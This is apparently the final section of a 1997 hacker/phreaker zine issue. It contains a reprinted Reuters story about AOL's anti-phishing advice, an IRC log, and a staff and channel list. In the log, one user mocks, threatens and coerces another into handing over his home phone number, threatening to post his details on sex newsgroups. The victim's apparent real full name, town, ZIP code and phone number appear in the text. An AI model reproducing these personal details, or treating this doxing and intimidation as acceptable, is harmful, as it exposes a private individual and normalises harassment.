  2205.  
  2206. ⌐CMP Media, 1996.
  2207. ═───────────────────────────────────────────────────────────═
  2208.  
  2209.  AOL urges its members to protect themselves    
  2210.  August 26, 1997
  2211.  By Franklin Paul
  2212.  
  2213.  NEW YORK (Reuter) - America Online Inc.'s subscribers can do as much, if not 
  2214.  more than the company can, to protect themselves from online theft and 
  2215.  fraud, a company executive said Tuesday following a recent scam.
  2216.  
  2217. The world's largest online service says smart members can do more to keep 
  2218. their personal information private than could any protective software program 
  2219. or lurking online police.
  2220.  
  2221. "If you want to protect yourself, you need to protect your personal 
  2222. information," Tatiana Gau, AOL's vice president of integrity assurance, said 
  2223. in an interview.
  2224.  
  2225. "We have a three-pronged approach; to educate, empower and enforce, where we 
  2226. put the tools in the hands of our members to allow them to protect 
  2227. themselves," against those who would take personal information to commit 
  2228. crimes like credit card fraud, she said.
  2229.  
  2230. The approach includes frequently reminding the service's more than 8 million 
  2231. members that AOL staff members will never ask for password or billing 
  2232. information, and telling them where to go to report a scam in action.
  2233.  
  2234. "People are beginning to realize that the same kind of scams that occur in 
  2235. real life do occur online," Gau said. "So in the same way in real life you 
  2236. would never dream of giving out your PIN number to your ATM card, you 
  2237. shoudn't be doing it online either."
  2238.  
  2239. Earlier this month, a scam was perpetrated on AOL whereby members received 
  2240. electronic mail that invited them to jump to a Web page which contained text 
  2241. of a letter from AOL Chairman Steve Case.
  2242.  
  2243. From there, another link asked members to enter billing information. Thinking 
  2244. they were providing data to AOL, they were really handing their vital 
  2245. information to thieves.
  2246.  
  2247. While Gau would not say how many members were duped by the scam, or if the 
  2248. perpetrators were caught, she said it was other AOL members that fingered the 
  2249. crooks.
  2250.  
  2251. "It was literally within a matter of hours of the mail being sent out that 
  2252. the e-mail was forwarded to us, which allowed us to very quickly get the site 
  2253. shut down," she said.
  2254.  
  2255. "The billing scam ... is really testimony to the fact that our ... mechanisms 
  2256. are working," she said.
  2257.  
  2258. She adds that the company's other security measures include adding alerts to 
  2259. the first screen that members see when they sign on and putting e-mail with 
  2260. safety tips in the mailboxes of new members.
  2261.  
  2262. AOL also urges members not to download files from sources they are unfamiliar 
  2263. with and it makes available free anti-virus software.
  2264.  
  2265. AOL's stock fell $1 to close at $66 on the New York Stock Exchange.
  2266.  
  2267. ⌐Reuters Ltd.
  2268.  
  2269. ═────────────────────────────────────────────────────────────────────────────═
  2270. ┌──────────────────────────────────────┐
  2271. │ Logs - Yaaay! It's IRC!!!            │
  2272. └──────────────────────────────────────┘
  2273.  
  2274. discore messing around with that always lame ZeR0-HeX:
  2275.  
  2276. Session Start: Mon Aug 18 01:31:53 1997
  2277. [1:31] <ZeR0-HeX> you're bullshitting
  2278. [1:31] <ZeR0-HeX> you don't know shit
  2279. [1:32] <ZeR0-HeX> if you really do know my phone number
  2280. [1:32] <ZeR0-HeX> tell it to me
  2281. <discore> ok!
  2282. Session Close: Mon Aug 18 01:33:16 1997
  2283.  
  2284. Session Start: Mon Aug 18 01:33:17 1997
  2285. [1:33] <ZeR0-HeX> may i ask where you received this information from?
  2286. <discore> my ereet hackmobile.
  2287. [1:33] <ZeR0-HeX> come on
  2288. [1:33] <ZeR0-HeX> i just wanna know
  2289. <discore> sorry tootsies, no can do
  2290. [1:33] <ZeR0-HeX> turn ur away message off!!!!!!!11
  2291. <discore> hmmm, whats yer phone #, i dont feel like calling the operator
  2292. [1:34] <ZeR0-HeX> alright
  2293. [1:34] <ZeR0-HeX> well
  2294. [1:34] <ZeR0-HeX> i believe ya
  2295. <discore> teehee
  2296. <discore> elite!
  2297. <discore> so
  2298. [1:35] <ZeR0-HeX> what do you intend to do with this information? i have done nothing wrong to 
  2299.   you. so please don't do anything bad
  2300. <discore> why did ya copy phrack?
  2301. [1:35] <ZeR0-HeX> oh
  2302. <discore> thats not very nice you know
  2303. [1:35] <ZeR0-HeX> so this is what it's about
  2304. [1:35] <ZeR0-HeX> ok
  2305. [1:35] <ZeR0-HeX> i'll explain
  2306. [1:35] <ZeR0-HeX> but
  2307. [1:35] <ZeR0-HeX> you gotta promise not give my info out to anyone
  2308. [1:35] <ZeR0-HeX> ok?
  2309. <discore> teehee
  2310. <discore> over 14,000 ppl have it
  2311. [1:36] <ZeR0-HeX> who?
  2312. <discore> woot
  2313. <discore> tell me why
  2314. <discore> i want to kn0w
  2315. [1:36] <ZeR0-HeX> wait
  2316. [1:36] <ZeR0-HeX> i'll tell you
  2317. [1:36] <ZeR0-HeX> but 1st
  2318. [1:36] <ZeR0-HeX> you gotta tell me where you got the info from
  2319. [1:36] <ZeR0-HeX> and you gotta tell me who the 14000 people are
  2320. [1:36] <ZeR0-HeX> and how theygot it
  2321. <discore> hmm, i dont know all the names of the 14,000 ppl
  2322. <discore> but i will check it!
  2323. <discore> ill make ya a deal, ok?
  2324. [1:37] <ZeR0-HeX> how the hell did 14000 people get it?
  2325. <discore> wanna deal?
  2326. [1:37] <ZeR0-HeX> sure
  2327. <discore> oK!
  2328. [1:37] * ZeR0-HeX listening
  2329. [1:37] <ZeR0-HeX> ???
  2330. <discore> tell me a real phone # of your house, and i will tell you what you want to know, if 
  2331.   the phone # is fake-o then inphoz get posted on alt.sex.*
  2332. [1:38] <ZeR0-HeX> why do you want my phone number?
  2333. [1:38] <ZeR0-HeX> so you can give it to the 14,000 people
  2334. [1:38] <ZeR0-HeX> nice try
  2335. <discore> cause im too lazy to call the operator
  2336. [1:38] <ZeR0-HeX> then you can bullshit me after
  2337. <discore> no actually i keep files on ppl
  2338. <discore> heh
  2339. <discore> and like, i just want it for personall use
  2340. <discore> i wont play with ya
  2341. [1:38] <ZeR0-HeX> who the fuck are you??
  2342. <discore> dont worry, i could still get it through other ways than you
  2343. [1:38] <ZeR0-HeX> why do you have my info???
  2344. <discore> im discore!
  2345. [1:39] <ZeR0-HeX> oh man..
  2346. <discore> thats what our deal is about buddy
  2347. <discore> its a fair trade
  2348. [1:39] <ZeR0-HeX> jeez, you're something :-)
  2349. [1:39] <ZeR0-HeX> what info do i want1!!
  2350. [1:39] <ZeR0-HeX> the only thing i want
  2351. [1:39] <ZeR0-HeX> is to not let the 14,000 people know
  2352. [1:39] <ZeR0-HeX> listen
  2353. [1:39] <ZeR0-HeX> if you were really a hacker
  2354. [1:40] <ZeR0-HeX> you would have known my number
  2355. <discore> well, you are right
  2356. <discore> BUT im lazy and bored tonight so you are my project
  2357. [1:41] <ZeR0-HeX> ok
  2358. [1:41] <ZeR0-HeX> if i give you my phone number
  2359. [1:41] <ZeR0-HeX> what would i get back in return
  2360. [1:41] <ZeR0-HeX> ABSOLUTELY SHIT
  2361. <discore> whatever you want out of me, sex or anything!
  2362. [1:41] <ZeR0-HeX> i still can't stop the 14000 people
  2363. [1:41] <ZeR0-HeX> lol
  2364. [1:41] <ZeR0-HeX> hehe
  2365. <discore> so
  2366. <discore> wanna do that?
  2367. [1:42] <ZeR0-HeX> ok
  2368. [1:42] <ZeR0-HeX> but wait
  2369. [1:42] <ZeR0-HeX> i'll giva ya my number
  2370. <discore> K!
  2371. [1:42] <ZeR0-HeX> but
  2372. [1:42] <ZeR0-HeX> what are you gonna tell me?
  2373. <discore> how the ppl got it, where they got it and why it was made public.
  2374. [1:42] <ZeR0-HeX> hmmm
  2375. [1:42] <ZeR0-HeX> ok
  2376. [1:42] <ZeR0-HeX> but
  2377. [1:43] <ZeR0-HeX> wait
  2378. [1:43] <ZeR0-HeX> after i give you the numer
  2379. [1:43] <ZeR0-HeX> number
  2380. [1:43] <ZeR0-HeX> you can't tell anyone it
  2381. [1:43] <ZeR0-HeX> ok?
  2382. <discore> i know!
  2383. [1:43] <ZeR0-HeX> no
  2384. [1:43] <ZeR0-HeX> don't bullshit me
  2385. <discore> why would i bullshit you?
  2386. [1:43] <ZeR0-HeX> this is serious shit
  2387. <discore> im getting something.
  2388. [1:43] <ZeR0-HeX> ok
  2389. [1:43] <ZeR0-HeX> dont tell anyone
  2390. [1:43] <ZeR0-HeX> ok
  2391. <discore> k..
  2392. [1:43] <ZeR0-HeX> fine
  2393. [1:43] <ZeR0-HeX> you go 1st
  2394. [1:43] <ZeR0-HeX> with the info
  2395. <discore> bahahaha
  2396. [1:43] <ZeR0-HeX> then i'll go
  2397. <discore> nein, cause i have something that is more important to you.
  2398. [1:44] <ZeR0-HeX> obviously i'll tell you the number!! i dont want my address and name posted 
  2399.   up everywhere in the internet
  2400. [1:44] <ZeR0-HeX> alright
  2401. [1:44] <ZeR0-HeX> alright
  2402. [1:44] <ZeR0-HeX> 860
  2403. [1:44] <ZeR0-HeX> 875
  2404. [1:44] <ZeR0-HeX> 2117
  2405. <discore> well teehee, i dont trust you, but you shouldnt trust me but im in control.
  2406. [1:44] <ZeR0-HeX> there
  2407. [1:44] <ZeR0-HeX> gimme a call tomorrow
  2408. [1:44] <ZeR0-HeX> :-)
  2409. [1:44] <ZeR0-HeX> ok
  2410. <discore> lemme look for a sec to verify
  2411. [1:44] <ZeR0-HeX> now can i have the info please?
  2412. [1:44] <ZeR0-HeX> ok
  2413. [1:44] <ZeR0-HeX> wait
  2414. [1:44] <ZeR0-HeX> hey
  2415. [1:44] <ZeR0-HeX> go to www.yahoo.com
  2416. [1:44] <ZeR0-HeX> go to people search
  2417. [1:45] <ZeR0-HeX> type in mumtaz alam
  2418. [1:45] <ZeR0-HeX> ellington, ct 06029
  2419. [1:45] <ZeR0-HeX> there, made it ez fer ya
  2420. <discore> extremly
  2421. <discore> i used yp.uswest.com
  2422. <discore> but thats ok!
  2423. <discore> now what you wanna know?
  2424. [1:45] <ZeR0-HeX> ok
  2425. [1:45] <ZeR0-HeX> the public crap?
  2426. [1:46] <ZeR0-HeX> how the 14000 people got it
  2427. [1:46] <ZeR0-HeX> etc.
  2428. [1:46] <ZeR0-HeX> how you got it
  2429. [1:46] <ZeR0-HeX> etc.
  2430. <discore> well, there is a land called #phreak
  2431. <discore> they owned you recently
  2432. [1:46] <ZeR0-HeX> grrrrrr
  2433. [1:46] <ZeR0-HeX> and....
  2434. <discore> well its not our fault you used your real name in email headers
  2435. [1:46] <ZeR0-HeX> what???
  2436. <discore> and ppl spread shit.
  2437. [1:46] <ZeR0-HeX> which one/?
  2438. [1:46] <ZeR0-HeX> not zer0-hex
  2439. [1:46] <ZeR0-HeX> what e-mail headers?
  2440. <discore> teehee
  2441. <discore> in your emails
  2442. <discore> it has your real name
  2443. <discore> aol does it by defult
  2444. <discore> :)
  2445. [1:47] <ZeR0-HeX> i use zer0-hex@juno.com
  2446. [1:47] <ZeR0-HeX> how did they get faraz outta that
  2447. [1:47] <ZeR0-HeX> huh?
  2448. <discore> well, heh, thats how we got it!
  2449. [1:47] <ZeR0-HeX> what has it?
  2450. [1:47] <ZeR0-HeX> where?
  2451. [1:47] <ZeR0-HeX> where????
  2452. <discore> settle young child of the force
  2453. [1:48] <ZeR0-HeX> well?
  2454. [1:48] <ZeR0-HeX> sometime today would be nice?
  2455. [1:48] <ZeR0-HeX> i'd like to get some sleep
  2456. <discore> i dont understand the question.
  2457. [1:48] <ZeR0-HeX> what e-mail header?
  2458. [1:48] <ZeR0-HeX> what about aol?
  2459. [1:48] <ZeR0-HeX> i dont have aol
  2460. <discore> well it seems you sent some mail from aol that contained your real name
  2461. [1:48] <ZeR0-HeX> huh?
  2462. [1:48] <ZeR0-HeX> where?
  2463. <discore> and that went public cause no one was hapy with you for copying phrack
  2464. [1:48] <ZeR0-HeX> when?
  2465. <discore> i dunno
  2466. <discore> geeze
  2467. <discore> im not god
  2468. [1:49] <ZeR0-HeX> i thought you had the answers
  2469. [1:49] <ZeR0-HeX> !!!
  2470. [1:49] <ZeR0-HeX> ok
  2471. [1:49] <ZeR0-HeX> now how did it get public?
  2472. [1:49] <ZeR0-HeX> and how did 14000 people get it?
  2473. <discore> ppl spread inphoz fastly in the hightech society we live in
  2474. <discore> well
  2475. <discore> not 1400
  2476. <discore> not 14000
  2477. <discore> i exaggeratted
  2478. [1:49] <ZeR0-HeX> but why would 14000 people want it?
  2479. <discore> for educational purposes
  2480. [1:49] <ZeR0-HeX> jeez
  2481. [1:50] <ZeR0-HeX> is uh
  2482. [1:50] <ZeR0-HeX> anyone gonna send me a bomb?
  2483. [1:50] <ZeR0-HeX> :-)
  2484. [1:50] <ZeR0-HeX> or gimme a 1000 prank calls
  2485. <discore> i hope not for your sake.
  2486. <discore> have you got anything yet?
  2487. <discore> trust me, the ppl who got these infoz could easily get your phone #, i just did it 
  2488.   first. teehee
  2489. [1:51] <ZeR0-HeX> what do you mean, have i got anything?
  2490. <discore> have you got any prank calls or any bombs or anything fun?
  2491. [1:51] <ZeR0-HeX> no
  2492. [1:51] <ZeR0-HeX> not yet..
  2493. [1:51] <ZeR0-HeX> :-)
  2494. [1:51] <ZeR0-HeX> hehe
  2495. <discore> then you wont
  2496. [1:51] <ZeR0-HeX> ok
  2497. <discore> ppl got your infoz because they were bored
  2498. [1:51] <ZeR0-HeX> so uh
  2499. [1:51] <ZeR0-HeX> ok
  2500. [1:51] <ZeR0-HeX> now...
  2501. <discore> not cause they wanted to shut off your phones
  2502. [1:51] <ZeR0-HeX> ok
  2503. [1:52] <ZeR0-HeX> ok
  2504. [1:52] <ZeR0-HeX> ok
  2505. [1:52] <ZeR0-HeX> now about phrack
  2506. <discore> so they wont do shit with them
  2507. [1:52] <ZeR0-HeX> listen
  2508. [1:52] <ZeR0-HeX> ok
  2509. [1:52] <ZeR0-HeX> are you listening?
  2510. <discore> yes, i always am.
  2511. [1:52] <ZeR0-HeX> ok
  2512. [1:52] <ZeR0-HeX> um
  2513. [1:52] <ZeR0-HeX> i think i made it in late 96
  2514. [1:52] <ZeR0-HeX> now lissen
  2515. [1:52] <ZeR0-HeX> i went to a web site
  2516. [1:52] <ZeR0-HeX> and i found a mcdonald's thingie
  2517. [1:53] <ZeR0-HeX> I SWEAR TO GOD IT HAD nothing on it that sed phrack
  2518. [1:53] <ZeR0-HeX> i swear
  2519. [1:53] <ZeR0-HeX> i ain't lying
  2520. [1:53] <ZeR0-HeX> wait
  2521. [1:53] <ZeR0-HeX> do you want me to say this shit in phreak?
  2522. <discore> sure!
  2523. Session Close: Mon Aug 18 01:53:34 1997
  2524.  
  2525. Session Start: Mon Aug 18 01:53:35 1997
  2526. [1:53] <ZeR0-HeX> so people will stop bugging me?
  2527. [1:53] <ZeR0-HeX> k
  2528. Session Close: Mon Aug 18 01:53:39 1997
  2529.  
  2530. Session Start: Mon Aug 18 01:54:29 1997
  2531. [1:54] <ZeR0-HeX> like i was saying
  2532. Session Close: Mon Aug 18 01:54:34 1997
  2533.  
  2534. Session Start: Mon Aug 18 02:02:33 1997
  2535. [2:02] <ZeR0-HeX> ello?
  2536. Session Close: Mon Aug 18 02:02:54 1997
  2537.  
  2538. Session Start: Mon Aug 18 02:04:33 1997
  2539. [2:04] <ZeR0-HeX> HY!!!!!!
  2540. [2:04] <ZeR0-HeX> HEY!!!!
  2541. [2:04] <ZeR0-HeX> WAKE THE FUCK UP!!!!
  2542. Session Close: Mon Aug 18 02:06:12 1997
  2543.  
  2544. ═────────────────────────────────────────────────────────────────────────────═
  2545.   ┌--──────────────────────┐               ┌--──────────────────────┐
  2546.   :   Havoc Bell Systems   │               :    Acknowledgements    │
  2547.   ·-──-────────────────────┘               ·-──-────────────────────┘
  2548. ArcAngl   : Military boy                 |Banshee| : brought kOS to thtj.com
  2549. Keystroke : Submissions Editor           ghost     : kills cops
  2550. KungFuFox : Newsboy                      g-line    : hates cops
  2551. lurk3r    : Freed!                       k1llah    : likes cops
  2552. memor     : Ueberleet French phreak      Modify    : met RATM and WuTang
  2553. REality   : #phreak's bot Own3r          shamrock  : is pheared by his dad
  2554. Scud-O    : Hates Wal-Mart               shoelace  : smartass 3/4 of the time
  2555. UnaBomber : Obsessed with streetbikes    wyclef    : loves cops
  2556.  
  2557.                             ┌--────────────┐
  2558.                             :   channels   │
  2559.                             ·-──-──────────┘
  2560.                         #phreak     : Home Sweet Home
  2561.                         #sin        : SIN Home
  2562.                         #hackphreak : cool channel
  2563.  
  2564. ═────────────────────────────────────────────────────────────────────────────═
  2565. Issue 15 is out October 1st!
  2566.  
  2567.  Send all articles for issue 15 to Keystroke at: keystroke@thepentagon.com
  2568.  Editor's note: The above strong suggestion is not a joke!
  2569.  
  2570.                           ┌--───────────────────────┐
  2571.                           :  - End of Communique -  │
  2572.                           ·-──-─────────────────────┘
  2573.